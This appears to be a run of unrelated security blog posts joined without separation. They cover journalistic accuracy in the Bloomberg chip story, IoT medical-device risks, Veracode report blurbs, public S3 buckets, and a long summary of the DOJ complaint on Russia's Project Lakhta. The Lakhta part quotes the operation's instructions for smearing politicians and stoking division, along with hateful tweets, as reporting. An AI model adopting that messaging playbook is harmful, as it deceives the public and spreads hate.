Journalism is about telling the truth, not a close approximation of the truth,  but the true truth. They don't do a good job at this in cybersecurity.

Take, for example, a recent incident where the Associated Press fired a reporter for photoshopping his shadow out of a photo. The AP took a scorched-earth approach, not simply firing the photographer, but removing all his photographs from their library.

That's because there is a difference between truth and near truth.

Now consider Bloomberg's story, such as a photograph of a tiny chip. Is that a photograph of the actual chip the Chinese inserted into the motherboard? Or is it another chip, representing the size of the real chip? Is it truth or near truth?

Or consider the technical details in Bloomberg's story. They are garbled, as this discussion shows. Something like what Bloomberg describes is certainly plausible, something exactly what Bloomberg describes is impossible. Again there is the question of truth vs. near truth.

There are other near truths involved. For example, we know that supply chains often replace high-quality expensive components with cheaper, lower-quality knockoffs. It's perfectly plausible that some of the incidents Bloomberg describes is that known issue, which they are then hyping as being hacker chips. This demonstrates how truth and near truth can be quite far apart, telling very different stories.

Another example is a NYTimes story about a terrorist's use of encryption. As I've discussed before, the story has numerous "near truth" errors. The NYTimes story is based upon a transcript of an interrogation of the hacker. The French newspaper Le Monde published excerpts from that interrogation, with details that differ slightly from the NYTimes article.

One the justifications journalists use is that near truth is easier for their readers to understand. First of all, that's not justification for false hoods. If the words mean something else, then it's false. It doesn't matter if its simpler. Secondly, I'm not sure they actually are easier to understand. It's still techy gobbledygook. In the Bloomberg article, if I as an expert can't figure out what actually happened, then I know that the average reader can't, either, no matter how much you've "simplified" the language.

Stories can solve this by both giving the actual technical terms that experts can understand, then explain them. Yes, it eats up space, but if you care about the truth, it's necessary.

In groundbreaking stories like Bloomberg's, the length is already enough that the average reader won't slog through it. Instead, it becomes a seed for lots of other coverage that explains the story. In such cases, you want to get the techy details, the actual truth, correct, so that we experts can stand behind the story and explain it. Otherwise, going for the simpler near truth means that all us experts simply question the veracity of the story.

The companies mentioned in the Bloomberg story have called it an outright lie. However, the techniques roughly are plausible. I have no trouble believing something like that has happened at some point, that an intelligence organization subverted chips to hack BMC controllers in servers destined for specific customers. I'm sure our own government has done this at least once, as Snowden leaked documents imply. However, that doesn't mean the Bloomberg story is truthful. We know they have smudged details. We know they've hyped details, like the smallness of the chips involved.

This is why I trust the high-tech industry press so much more than the mainstream press. Despite priding itself as the "newspaper of record", on these technical issues the NYTimes is anything but. It's the techy sites like Ars Technica and sometimes Wired that become the "paper of record" on things cyber. I mention this because David Sanger gets all the credit for Stuxnet reporting when he's done a horrible job, while numerous techy sites have done the actual work figuring out what went on.

The Connection Between IoT and Consumers’ Physical Health

When we think about how technology impacts our daily lives, we don’t really notice it unless it’s a big-picture concept. In fact, there are many areas where technology plays an outsized impact on our lives — and we hardly notice it at all. Traffic lights can be controlled remotely, thermostats can automatically warm or chill your home based on what season it is. The truth is, these small individual facets add up to a larger whole: the Internet of Things or IoT. IoT applications are endless, but can sometimes be insecure. Imagine if that were the case when it comes to the IoT devices designed to aid with our personal health.

IoT and our physical health are more related than many of us think, and their connection has led to revolutionary, preventative health care. Smartwatches monitor our overall health and fitness level thanks to miniaturized gyroscopes and heart rate monitors. This information can and has been used to warn people of impending heart attacks — giving them enough time to contact emergency services for help. Implants, such as pacemakers, can monitor a patient from afar, giving doctors a detailed analysis of their condition. These devices have advanced modern-day health care for the better, but their design can occasionally contain vulnerabilities that may expose users to a cyberattack.First, let’s consider the smartwatch. It’s a convenient tool that aids us in monitoring our daily well-being. But the data it collects could be compromised through a variety of attacks. For example, Fitbit suffered a minor breach in 2016, resulting in cybercriminals trying to scam the company’s refund system. In another example, Strava, a social network for athletes, saw its users suffer a spate of thefts — a potential consequence of sharing GPS coordinates from their IoT device.

Alternatively, flaws found in implants, such as pacemakers, cochlear and others can be leveraged by cybercriminals to conduct attacks that impact our physical well-being. That’s because many implants today can be remotely manipulated, potentially giving cybercriminals the tools they need to cause a patient physical harm. For example, a recent study from academic researchers at the Catholic University of Leuven found neurostimulators, brain implants designed to help monitor and personalize treatments for people living with Parkinson’s disease, are vulnerable to remote attack. If an attack were successful, a cybercriminal could prevent a patient from speaking or moving.

Remember, these IoT implants still do a lot more good than harm, as they give medical professionals unparalleled insights into a patient’s overall condition and health. They could also help design better treatments in the future. However, in order to be able to reap their benefits in a safe way, users just need to make sure they take proactive security steps before implementing them.

Before introducing an IoT device for health care into your life, make sure you take the time to do your research. Look up the device in question and its manufacturer to see if the device had any prior breaches, and the manufacturer’s actions or responses to that. Speak with your doctor about the security standards around the IoT implant, as well. Ask if its security has been tested, how it’s been tested and how an implant can be updated to patch any security-related issues. After all, technology is becoming a more significant part of our lives — we owe it to ourselves to secure it so we can enjoy the benefits it brings to the table.

To learn more about securing your IoT devices from cyberattacks, be sure to follow us at @McAfee and @McAfee_Home.

The post The Connection Between IoT and Consumers’ Physical Health appeared first on McAfee Blogs.

Quick Take: Chris Eng On The Security Practitioner’s Role In The Future Of Secure Software Development

Veracode State of Software Security Chris Eng Video

The State of Software Security Volume 9 highlights that the sheer volume of open flaws within enterprise applications is too staggering to tackle at once. Which means that organizations need to find effective ways to prioritize which flaws they fix first. While many organizations are doing a good job prioritizing by flaw severity, data this year shows that they’re not effectively considering other risk factors such as the criticality of the application or exploitability of flaws. One school of thought is that application security practitioners need to step in to help developers most effectively prioritize their fixes. In this quick take video, Chris Eng looks at the security practitioner's role in releasing secure software.


To learn more and read the full report, visit

Quick Take: Advancing AppSec Requires a Partnership Between Security and Development

The State of Software Security Volume 9 shows that the speed at which organizations fix flaws they discover in their code directly mirrors the level of risk incurred by applications. The faster organizations close vulnerabilities, the less risk software poses over time. In this quick take video, Chris Wysopal discusses how security and development teams can work together to reduce application security risk.


To learn more and read the full report, visit

Quick Take: The State of Software Security in 2018

The State of Software Security Volume 9 looks at both the good and bad news about the enterprise's progress on advancing application security. The data offers many signs of encouragement that organizations are incrementally moving the needle, though there is still plenty of work to be done to shore up application risk. In this quick take video, Chris Wysopal shares his views on the state of software security in 2018.


To read the full report, visit

DisruptOps: How S3 Buckets Become Public, and the Fastest Way to Find Yours

Posted under:

How S3 Buckets Become Public, and the Fastest Way to Find Yours

In What Security Managers Need to Know About Amazon S3 Exposures we mentioned that one of the reasons finding public S3 buckets is so darn difficult is because there are multiple, overlapping mechanisms in place that determine the ultimate amount of S3 access. To be honest, there’s a chance I don’t even know all the edge cases but this list should cover the vast majority of situations.

Read the full post at DisruptOps

- Rich (0) Comments Subscribe to our daily email digest

Project Lakhta: Putin’s Chef spends $35M on social media influence

Project Lakhta is the name of a Russian project that was further documented by the Department of Justice last Friday in the form of sharing a Criminal Complaint against Elena Alekseevna Khusyaynova, said to be the accountant in charge of running a massive organization designed to inject distrust and division into the American elections and American society in general.
In a fairly unusual step, the 39 page Criminal Complaint against Khusyaynova, filed just last month in Alexandria, Virginia, has already been unsealed, prior to any indictment or specific criminal charges being brought against her before a grand jury.  US Attorney G. Zachary Terwilliger says "The strategic goal of this alleged conspiracy, which continues to this day, is to sow discord in the U.S. political system and to undermine faith in our democratic institutions."

The data shared below, intended to summarize the 39 page criminal complaint, contains many direct quotes from the document, which has been shared by the DOJ. ( Click for full Criminal Complaint against Elena Khusyaynova )

Since May 2014 the complaint shows that the following organizations were used as cover to spread distrust towards candidates for political office and the political system in general.

Internet Research Agency LLC ("IRA")
Internet Research LLC
MediaSintez LLC
GlavSet LLC
MixInfo LLC
Azimut LLC
NovInfo LLC
Nevskiy News LLC ("NevNov")
Economy Today LLC
National News LLC
Federal News Agency LLC ("FAN")
International News Agency LLC ("MAN")

These entities employed hundreds of individuals in support of Project Lakhta's operations with an annual global budget of millions of US dollars.  Only some of their activity was directed at the United States.

Prigozhin and Concord 

Concord Management and Consulting LLC and Concord Catering (collectively referred to as "Concord") are related Russian entities with various Russian government contracts.  Concord was the primary source of funding for Project Lakhta, controlling funding, recommending personnel, and overseeing activities through reporting and interaction with the management of various Project Lakhta entities.

Yevgeniy Viktorovich Prigozhin is a Russian oligarch closely identified with Russian President Vladimir Putin.  He began his career in the food and restaurant business and is sometimes referred to as "Putin's Chef."  Concord has Russian government contracts to feed school children and the military.

Prigozhin was previously indicted, along with twelve others and three Russian companies, with committing federal crimes while seeking to interfere with the US elections and political process, including the 2016 presidential election.

Project Lakhta internally referred to their work as "information warfare against the United States of America" which was conducted through fictitious US personas on social media platforms and other Internet-based media.

Lakhta has a management group which organized the project into departments, including a design and graphics department, an analysts department, a search-engine optimization ("SEO") department, an IT department and a finance department.

Khusyaynova has been the chief accountant of Project Lakhta's finance department since April of 2014, which included the budgets of most or all of the previously named organizations.  She submitted hundreds of financial vouchers, budgets, and payments requests for the Project Lakhta entities.  The money was managed through at least 14 bank accounts belonging to more Project Lakhta affiliates, including:

Glavnaya Liniya LLC
Merkuriy LLC
Obshchepit LLC
Potentsial LLC
Kompleksservis LLC
SPb Kulinariya LLC
Almira LLC
Pishchevik LLC
Galant LLC
Rayteks LLC
Standart LLC

Project Lakhta Spending 

Monthly reports were provided by Khusyaynova to Concord about the spendings for at least the period from January 2016 through July 2018.

A document sent in January 2017 including the projected budget for February 2017 (60 million rubles, or roughly $1 million USD), and an accounting of spending for all of calendar 2016 (720 million rubles, or $12 million USD).  Expenses included:

Registration of domain names
Purchasing proxy servers
Social media marketing expenses, including:
 - purchasing posts for social networks
 - advertisements on Facebook
 - advertisements on VKontakte
 - advertisements on Instagram
 - promoting posts on social networks

Other expenses were for Activists, Bloggers, and people who "developed accounts" on Twitter to promote online videos.

In January 2018, the "annual report" for 2017 showed 733 million Russian rubles of expenditure ($12.2M USD).

More recent expenses, between January 2018 and June 2018, included more than $60,000 in Facebook ads, and $6,000 in Instagram ads, as well as $18,000 for Bloggers and Twitter account developers.

Project Lakhta Messaging

From December 2016 through May 2018, Lakhta analysts and activist spread messages "to inflame passions on a wide variety of topics" including:
  • immigration
  • gun control and the Second Amendment 
  • the Confederate flag
  • race relations
  • LGBT issues 
  • the Women's March 
  • and the NFL national anthem debate.

Events in the United States were seized upon "to anchor their themes" including the Charleston church shootings, the Las Vegas concert shootings, the Charlottesville "Unite the Right" rally, police shootings of African-American men, and the personnel and policy decisions of the Trump administration.

Many of the graphics that were shared will be immediately recognizable to most social media users.

"Rachell Edison" Facebook profile
The graphic above was shared by a confirmed member of the conspiracy on December 5, 2016. "Rachell Edison" was a Facebook profile controlled by someone on payroll from Project Lakhta.  Their comment read  "Whatever happens, blacks are innocent. Whatever happens, it's all guns and cops. Whatever happens, it's all racists and homophobes. Mainstream Media..."

The Rachell Edison account was created in September 2016 and controlled the Facebook page "Defend the 2nd".  Between December 2016 and May 2017, "while concealing its true identity, location, and purpose" this account was used to share over 700 inflammatory posts related to gun control and the Second Amendment.

Other accounts specialized on other themes.  Another account, using the name "Bertha Malone", was created in June 2015, using fake information to claim that the account holder lived in New York City and attended a university in NYC.   In January 2016, the account created a Facebook page called "Stop All Invaders" (StopAI) which shared over 400 hateful anti-immigration and anti-Islam memes, implying that all immigrants were either terrorists or criminals.  Posts shared by this acount reached 1.3 million individuals and at least 130,851 people directly engaged with the content (for example, by liking, sharing, or commenting on materials that originated from this account.)

Some examples of the hateful posts shared by "Bertha Malone" that were included in the DOJ criminal complaint,  included these:

The latter image was accompanied by the comment:

"Instead this stupid witch hunt on Trump, media should investigate this traitor and his plane to Islamize our country. If you are true enemy of America, take a good look at Barack Hussein Obama and Muslim government officials appointed by him."

Directions to Project Lakhta Team Members

The directions shared to the propaganda spreaders gave very specific examples of how to influence American thought with guidance on what sources and techniques should be used to influence particular portions of our society.  For example, to further drive wedges in the Republican party, Republicans who spoke out against Trump were attacked in social media:
(all of these are marked in the Criminal Complaint as "preliminary translations of Russian text"):

"Brand McCain as an old geezer who has lost it and who long ago belonged in a home for the elderly. Emphasize that John McCain's pathological hatred towards Donald Trump and towards all his initiatives crosses all reasonable borders and limits.  State that dishonorable scoundrels, such as McCain, immediately aim to destroy all the conservative voters' hopes as soon as Trump tries to fulfill his election promises and tries to protect the American interests."

"Brand Paul Ryan a complete and absolute nobody incapable of any decisiveness.  Emphasize that while serving as Speaker, this two-faced loudmouth has not accomplished anything good for America or for American citizens.  State that the only way to get rid of Ryan from Congress, provided he wins in the 2018 primaries, is to vote in favor of Randy Brice, an American veteran and an iron worker and a Democrat."

Frequently the guidance was in relation to a particular news headline, where directions on how to use the headline to spread their message of division where shared. A couple examples of these:

After a news story "Trump: No Welfare To Migrants for Grants for First 5 Years" was shared, the conspiracy was directed to twist the messaging like this:

"Fully support Donald Trump and express the hope that this time around Congress will be forced to act as the president says it should. Emphasize that if Congress continues to act like the Colonial British government did before the War of Independence, this will call for another revolution.  Summarize that Trump once again proved that he stands for protecting the interests of the United States of America."

In response to an article about scandals in the Robert Mueller investigation, the direction was to use this messaging:

"Special prosecutor Mueller is a puppet of the establishment. List scandals that took place when Mueller headed the FBI.  Direct attention to the listed examples. State the following: It is a fact that the Special Prosector who leads the investigation against Trump represents the establishment: a politician with proven connections to the U.S. Democratic Party who says things that should either remove him from his position or disband the entire investigation commission. Summarize with a statement that Mueller is a very dependent and highly politicized figure; therefore, there will be no honest and open results from his investigation. Emphasize that the work of this commission is damaging to the country and is aimed to declare impeachement of Trump. Emphasize that it cannot be allowed, no matter what."

Many more examples are given, some targeted at particular concepts, such as this direction regarding "Sanctuary Cities":

"Characterize the position of the Californian sanctuary cities along with the position of the entire California administration as absolutely and completely treacherous and disgusting. Stress that protecting an illegal rapist who raped an American child is the peak of wickedness and hypocrisy. Summarize in a statement that "sanctuary city" politicians should surrender their American citizenship, for they behave as true enemies of the United States of America"

Some more basic guidance shared by Project Lakhta was about how to target conservatives vs. liberals, such as "if you write posts in a liberal group, you must not use Breitbart titles.  On the contrary, if you write posts in a conservative group, do not use Washington Post or BuzzFeed's titles."

We see the "headline theft" implied by this in some of their memes.  For example, this Breitbart headline:

Became this Project Lakhta meme (shared by Stop All Immigrants):

Similarly this meme originally shared as a quote from the Heritage Foundation, was adopted and rebranded by Lakhta-funded "Stop All Immigrants": 

Twitter Messaging and Specific Political Races

Many Twitter accounts shown to be controlled by paid members of the conspiracy were making very specific posts in support of or in opposition to particular candidates for Congress or Senate.  Some examples listed in the Criminal Complaint include:

@CovfefeNationUS posting:

Tell us who you want to defeat!  Donate $1.00 to defeat @daveloebsack Donate $2.00 to defeat @SenatorBaldwin Donate $3.00 to defeat @clairecmc Donate $4.00 to defeat @NancyPelosi Donate $5.00 to defeat @RepMaxineWaters Donate $6.00 to defeat @SenWarren

Several of the Project Lakhta Twitter accounts got involved in the Alabama Senate race, but to point out that the objective of Lakhta is CREATE DISSENT AND DISTRUST, they actually tweeted on opposite sides of the campaign:

One Project Lakhta Twitter account, @KaniJJackson, posted on December 12, 2017: 

"Dear Alabama, You have a choice today. Doug Jones put the KKK in prison for murdering 4 young black girls.  Roy Moore wants to sleep with your teenage daughters. This isn't hard. #AlabamaSenate"

while on the same day @JohnCopper16, also a confirmed Project Lakhta Twitter account, tweeted:

"People living in Alabama have different values than people living in NYC. They will vote for someone who represents them, for someone who they can trust. Not you.  Dear Alabama, vote for Roy Moore."

@KaniJJackson was a very active voice for Lakhta.  Here are some additional tweets for that account:

"If Trump fires Robert Mueller, we have to take to the streets in protest.  Our democracy is at stake." (December 16, 2017)

"Who ended DACA? Who put off funding CHIP for 4 months? Who rejected a deal to restore DACA? It's not #SchumerShutdown. It's #GOPShutdown." (January 19, 2018)

@JohnCopper16 also tweeted on that topic: 
"Anyone who believes that President Trump is responsible for #shutdown2018 is either an outright liar or horribly ignorant. #SchumerShutdown for illegals. #DemocratShutdown #DemocratLosers #DemocratsDefundMilitary #AlternativeFacts"   (January 20, 2018)

@KaniJJackson on Parkland, Florida and the 2018 Midterm election: 
"Reminder: the same GOP that is offering thoughts and prayers today are the same ones that voted to allow loosening gun laws for the mentally ill last February.  If you're outraged today, VOTE THEM OUT IN 2018. #guncontrol #Parkland"

They even tweet about themselves, as shown in this pair of tweets!

@JemiSHaaaZzz (February 16, 2018):
"Dear @realDonaldTrump: The DOJ indicted 13 Russian nationals at the Internet Research Agency for violating federal criminal law to help your campaign and hurt other campaigns. Still think this Russia thing is a hoax and a witch hunt? Because a lot of witches just got indicted."

@JohnCopper16 (February 16, 2018): 
"Russians indicted today: 13  Illegal immigrants crossing Mexican border indicted today: 0  Anyway, I hope all those Internet Research Agency f*ckers will be sent to gitmo." 

The Russians are also involved in "getting out the vote" - especially of those who hold strongly divisive views:

@JohnCopper16 (February 27, 2018):
"Dem2018 platform - We want women raped by the jihadists - We want children killed - We want higher gas prices - We want more illegal aliens - We want more Mexican drugs And they are wondering why @realDonaldTrump became the President"

@KaniJJackson (February 19, 2018): 
"Midterms are 261 days, use this time to: - Promote your candidate on social media - Volunteer for a campaign - Donate to a campaign - Register to vote - Help others register to vote - Spread the word We have only 261 days to guarantee survival of democracy. Get to work! 

More recent tweets have been on a wide variety of topics, with other accounts expressing strong views around racial tensions, and then speaking to the Midterm elections: 

@wokeluisa (another confirmed Project Lakhta account): 
"Just a reminder that: - Majority black Flint, Michigan still has drinking water that will give you brain damage if consumed - Republicans are still trying to keep black people from voting - A terrorist has been targeting black families for assassination in Austin, Texas" 

and then, also @wokeluisa: (March 19, 2018): 
"Make sure to pre-register to vote if you are 16 y.o. or older. Don't just sit back, do something about everything that's going on because November 6, 2018 is the date that 33 senate seats, 436 seats in the House of Representatives and 36 governorships will be up for re-election." 

And from @johncopper16 (March 22, 2018):
"Just a friendly reminder to get involved in the 2018 Midterms. They are motivated They hate you They hate your morals They hate your 1A and 2A rights They hate the Police They hate the Military They hate YOUR President" 

Some of the many additional Twitter accounts controlled by the conspiracy mentioned in the Criminal Complaint: 

@UsaUsafortrump, @USAForDTrump, @TrumpWithUSA, @TrumpMov, @POTUSADJT, @imdeplorable201, @swampdrainer659, @maga2017trump, @TXCowboysRawk, @covfefeNationUS, @wokeluisa (2,000 tweets and at least 55,000 followers), @JohnCopper16, @Amconvoice, @TheTrainGuy13, @KaniJJackson, @JemiSHaaaZzz